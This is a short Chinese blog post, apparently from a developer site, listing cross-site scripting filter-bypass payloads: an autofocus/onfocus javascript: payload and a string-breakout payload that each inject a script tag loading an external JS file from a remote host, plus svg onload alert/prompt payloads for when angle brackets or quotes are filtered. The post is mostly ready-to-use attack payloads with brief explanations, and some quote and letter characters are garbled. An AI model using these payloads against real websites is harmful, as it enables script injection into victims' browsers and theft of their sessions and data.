
1.过滤了<>尖括号:
原理:利用html以及js伪协议,当用户打开页面缓冲页面会自动获取焦点,从而触发js代码生成script标签,达到目的。
autofocus οnfοcus=location=”javasCript:s=document.createElement(“script”);s.src=”http:///xx.js”; document.body.appendChild(s);”
2.漏洞已经在JS代码中,但是过滤了<>尖括号:
原理:利用js代码创建新script标签,引入外接js文件,达到目的。
‘;s=document.createElement(“script”);s.src=”http:///xx.js”;document.body.appendChild(s);”
3. <svg/οnlοad=alert(‘1’)/>
若’单引号被禁,alert(”)可用prompt()代替
<svg/οnlοad=prompt(1)/>
本文深入探讨了跨站脚本(XSS)攻击的几种高级技巧,包括如何绕过<>尖括号过滤,利用HTML及JS伪协议自动获取页面焦点触发恶意代码,以及在JS代码中创建新的script标签引入外部JS文件实现攻击目的。此外,还介绍了如何使用SVG标签结合onload事件触发alert或prompt弹窗,即使单引号被禁用也能成功执行。
1万+

被折叠的 条评论
为什么被折叠?



